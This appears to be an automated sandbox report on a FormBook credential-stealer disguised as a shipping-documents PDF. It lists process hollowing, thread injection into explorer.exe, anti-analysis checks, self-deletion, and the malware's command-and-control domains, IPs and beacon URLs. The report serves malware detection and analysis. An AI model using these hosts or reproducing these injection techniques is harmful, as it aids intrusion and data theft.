      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03524120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03524120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03524120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03524120 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035941E8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03532990 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352C182 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353A185 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035851BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035851BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035851BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035851BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035361A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035361A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035C49A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035C49A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035C49A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035C49A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035869A6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03520050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03520050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D1074 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035C2073 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D4015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D4015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03587016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03587016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03587016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0351B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0351B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0351B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0351B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0359B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0359B8D0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0359B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0359B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0359B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0359B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035040E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035040E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035040E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035058EC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03509080 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03583884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03583884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353F0BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353F0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353F0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035320A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035320A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035320A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035320A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035320A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035320A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035490AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0351EF40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0351FF60 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D8F6A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352F716 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0359FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0359FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353E730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03504F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03504F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035437F5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03518794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03587794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03587794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03587794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03517E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03517E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03517E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03517E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03517E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03517E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035CAE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035CAE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0351766D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03538E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035C1608 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035BFE3F mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350E620 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D8ED6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03548EC7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035BFEC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035336CC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035316E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035176E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0359FE87 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D0EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D0EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035D0EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035846A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03527D50 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03543D43 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03583540 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035B3D40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352C577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352C577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350AD30 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03513D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03513D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03513D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03513D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03513D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03513D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03513D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03513D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03513D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03513D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03513D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03513D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03513D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035CE539 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03534D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03534D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03534D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Process token adjusted: Debug
      Source: C:\Windows\SysWOW64\wlanext.exe | Process token adjusted: Debug
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_005632C6 LdrInitializeThunk,RtlAddVectoredExceptionHandler,LdrInitializeThunk,NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_005632D1 LdrInitializeThunk,RtlAddVectoredExceptionHandler,LdrInitializeThunk,NtProtectVirtualMemory,

      HIPS / PFW / Operating System Protection Evasion:

      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exe | Network Connect: 68.70.163.36 80
      Source: C:\Windows\explorer.exe | Network Connect: 156.224.66.93 80
      Maps a DLL or memory area into another process
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
      Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
      Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Modifies the context of a thread in another process (thread injection)
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Thread register set: target process: 3388
      Source: C:\Windows\SysWOW64\wlanext.exe | Thread register set: target process: 3388
      Queues an APC in another process (thread injection)
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Thread APC queued: target process: C:\Windows\explorer.exe
      Sample uses process hollowing technique
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: C90000
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Process created: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe 'C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe'
      Source: C:\Windows\SysWOW64\wlanext.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe'
      Source: explorer.exe, 00000003.00000002.485221215.0000000001398000.00000004.00000020.sdmp | Binary or memory string: ProgmanamF
      Source: explorer.exe, 00000003.00000000.276889024.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 0000000B.00000002.487832542.0000000004970000.00000002.00000001.sdmp | Binary or memory string: Program Manager
      Source: explorer.exe, 00000003.00000002.500202278.0000000006860000.00000004.00000001.sdmp, wlanext.exe, 0000000B.00000002.487832542.0000000004970000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000003.00000000.276889024.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 0000000B.00000002.487832542.0000000004970000.00000002.00000001.sdmp | Binary or memory string: Progman
      Source: explorer.exe, 00000003.00000000.276889024.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 0000000B.00000002.487832542.0000000004970000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F1083 cpuid
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Queries volume information: C:\ VolumeInformation

      Stealing of Sensitive Information:

      Yara detected FormBook
      Source: Yara match | File source: 00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000B.00000002.486000436.0000000003310000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000001.00000002.316144266.000000001E150000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000B.00000002.485873650.00000000032E0000.00000040.00000001.sdmp, type: MEMORY
      Yara detected Generic Dropper
      Source: Yara match | File source: Process Memory Space: Shipping Documents (INV,PL,BL)_pdf.exe PID: 5268, type: MEMORY
      Source: Yara match | File source: Process Memory Space: wlanext.exe PID: 5896, type: MEMORY

      Remote Access Functionality:

      Yara detected FormBook
      Source: Yara match | File source: 00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000B.00000002.486000436.0000000003310000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000001.00000002.316144266.000000001E150000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000B.00000002.485873650.00000000032E0000.00000040.00000001.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
      Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 512 | Rootkit 1 | Credential API Hooking 1 | Security Software Discovery 721 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
      Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion 22 | Input Capture 1 | Virtualization/Sandbox Evasion 22 | Remote Desktop Protocol | Input Capture 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 4 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
      Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 512 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Archive Collected Data 1 | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information 1 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 4 | SIM Card Swap | | Carrier Billing Fraud
      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information 3 | LSA Secrets | System Information Discovery 321 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings

      Behavior Graph

      Behavior Graph ID: 320999 | Sample: Shipping Documents (INV,PL,... | Startdate: 20/11/2020 | Architecture: WINDOWS | Score: 100
      Start node: DNS/IP www.leepl.com; HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com. Signatures: Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 12 other signatures.
      -> Shipping Documents (INV,PL,BL)_pdf.exe (started). Signatures: Tries to detect Any.run; Hides threads from debuggers.
         -> Shipping Documents (INV,PL,BL)_pdf.exe (started). DNS/IP: lifeandhealth.com.mx 192.185.170.106, 443, 49699 UNIFIEDLAYER-AS-1US United States. Signatures: Modifies the context of a thread in another process (thread injection); Tries to detect Any.run; Maps a DLL or memory area into another process; 3 other signatures.
            -> explorer.exe (injected). DNS/IP: www.iatlet.com 156.224.66.93, 49707, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles; drinksandfruits.com 68.70.163.36, 49706, 80 NETSOURCEUS United States; www.drinksandfruits.com. Signatures: System process connects to network (likely due to code injection or exploit).
               -> wlanext.exe (started). Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements.
                  -> cmd.exe (started)
                     -> conhost.exe (started)


      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      Source | Detection | Scanner | Label
      Shipping Documents (INV,PL,BL)_pdf.exe | 21% | Virustotal |

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      Source | Detection | Scanner | Label
      lifeandhealth.com.mx | 0% | Virustotal |
      drinksandfruits.com | 0% | Virustotal |

      URLs

      Source | Detection | Scanner | Label
      http://www.smartbulk.store | 0% | Avira URL Cloud | safe
      http://www.faithinfitness.net | 0% | Avira URL Cloud | safe
      https://lifeandhealth.com.mx/) | 100% | Avira URL Cloud | malware
      http://www.cannahavedessert.com/icm9/www.kalcio.site | 0% | Avira URL Cloud | safe
      http://www.faithinfitness.net/icm9/ | 0% | Avira URL Cloud | safe
      http://www.nationalcanopies.com/icm9/www.cannahavedessert.com | 0% | Avira URL Cloud | safe
      http://www.sajatypeworks.com | 0% | URL Reputation | safe
      http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
      http://www.smartbulk.store/icm9/ | 0% | Avira URL Cloud | safe
      http://www.iatlet.comReferer: | 0% | Avira URL Cloud | safe
      http://www.84streetchamber.comReferer: | 0% | Avira URL Cloud | safe
      http://www.iatlet.com/icm9/www.leepl.com | 0% | Avira URL Cloud | safe
      http://www.drinksandfruits.comReferer: | 0% | Avira URL Cloud | safe
      http://www.leepl.com | 0% | Avira URL Cloud | safe
      http://www.faithinfitness.netReferer: | 0% | Avira URL Cloud | safe
      http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
      http://www.iatlet.com/icm9/?jJEpd=tzd6f6hltsiSnXVk4gBb1fk7WFCRZPV169uDhTo4RpQ3iNZth/6Mcmvn9cuuL1csRrj/&wZ9=O2MpVr | 0% | Avira URL Cloud | safe
      http://www.nationalcanopies.com/icm9/ | 0% | Avira URL Cloud | safe
      http://www.urwpp.deDPlease | 0% | URL Reputation | safe
      http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
      http://www.faithinfitness.net/icm9/www.hunexhq.icu | 0% | Avira URL Cloud | safe
      http://www.frontierautoglasswheatfield.com | 0% | Avira URL Cloud | safe
      http://www.84streetchamber.com/icm9/ | 0% | Avira URL Cloud | safe
      http://cps.root-x1.letsencrypt.org0 | 0% | URL Reputation | safe
      http://www.images77.com/icm9/ | 0% | Avira URL Cloud | safe
      http://www.mademoisellepierre.com | 0% | Avira URL Cloud | safe
      http://www.images77.com | 0% | Avira URL Cloud | safe
      http://cps.letsencrypt.org0 | 0% | URL Reputation | safe
      http://www.cannahavedessert.com/icm9/ | 0% | Avira URL Cloud | safe
      http://www.gcsisgreen.com/icm9/ | 0% | Avira URL Cloud | safe
      http://www.iatlet.com | 0% | Avira URL Cloud | safe
      http://www.images77.comReferer: | 0% | Avira URL Cloud | safe
      http://www.frontierautoglasswheatfield.com/icm9/ | 0% | Avira URL Cloud | safe
      http://www.84streetchamber.com | 0% | Avira URL Cloud | safe
      http://www.gcsisgreen.com/icm9/www.smartbulk.store | 0% | Avira URL Cloud | safe
      http://www.hunexhq.icu | 0% | Avira URL Cloud | safe
      http://www.leepl.com/icm9/www.nationalcanopies.com | 0% | Avira URL Cloud | safe
      http://www.carterandcone.coml | 0% | URL Reputation | safe
      http://www.drinksandfruits.com/icm9/?jJEpd=vVVBlGd6XjiYufiPZCtpE8ClhRDPSp+6pFrvIQJUgNbClm9AeMVCLXFgut4jwu7Jje2C&wZ9=O2MpVr | 0% | Avira URL Cloud | safe
      http://www.machevate.com | 0% | Avira URL Cloud | safe
      http://www.verifyinstagram-help.com/icm9/ | 0% | Avira URL Cloud | safe
      http://www.hunexhq.icu/icm9/ | 0% | Avira URL Cloud | safe
      http://www.kalcio.site/icm9/www.mademoisellepierre.com | 0% | Avira URL Cloud | safe
      http://www.drinksandfruits.com/icm9/ | 0% | Avira URL Cloud | safe
      http://www.verifyinstagram-help.com/icm9/www.faithinfitness.net | 0% | Avira URL Cloud | safe
      http://www.frontierautoglasswheatfield.comReferer: | 0% | Avira URL Cloud | safe
      http://www.leepl.com/icm9/0%Avira URL Cloudsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.kalcio.siteReferer:0%Avira URL Cloudsafe
      http://www.mademoisellepierre.com/icm9/0%Avira URL Cloudsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.machevate.com/icm9/0%Avira URL Cloudsafe
      http://www.verifyinstagram-help.comReferer:0%Avira URL Cloudsafe
      http://www.gcsisgreen.comReferer:0%Avira URL Cloudsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.84streetchamber.com/icm9/www.verifyinstagram-help.com0%Avira URL Cloudsafe
      http://www.kalcio.site0%Avira URL Cloudsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
